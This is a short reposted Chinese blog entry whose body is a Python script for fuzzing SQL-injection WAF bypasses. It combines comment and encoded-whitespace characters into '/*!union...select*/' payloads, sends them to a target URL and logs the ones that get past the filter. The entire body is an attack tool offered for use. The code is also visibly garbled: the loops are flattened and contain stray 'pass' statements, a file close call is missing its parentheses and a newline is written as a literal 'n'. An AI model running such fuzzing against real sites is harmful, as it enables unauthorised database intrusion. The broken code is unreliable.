sql bypass waf fuzz python
作者:互联网
从freebuf copy过来的,先保存,有空再改
#encoding=utf-8 import requests url = "http://127.0.0.1/index.php?id=1" Fuzz_a = ['/*!','*/','/**/','/','?','~','!','.','%','-','*','+','='] Fuzz_b = [''] Fuzz_c = ['%0a','%0b','%0c','%0d','%0e','%0f','%0h','%0i','%0j'] FUZZ = Fuzz_a+Fuzz_b+Fuzz_c #配置fuzz字典 header = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0'} #设置请求的headers for a in FUZZ: pass for b in FUZZ: pass for c in FUZZ: for d in FUZZ: pass for e in FUZZ: pass PYLOAD = "/*!union"+a+b+c+d+e+"select*/ 1,2" urlp = url+PYLOAD res = requests.get(urlp,headers=header) #使用for排列组合fuzz字典并请求页面 if 'flag' in res.text: #这个flag需要改,根据你测的正常页面中,有什么字段是必然出现的 print ("[*]URL:"+ urlp +"过狗!") f=open('result.txt','a') f.write(urlp+"n") f.close
标签:55.0,python,waf,Fuzz,FUZZ,urlp,pass,fuzz 来源: https://www.cnblogs.com/zuoxiaolongzzz/p/12496064.html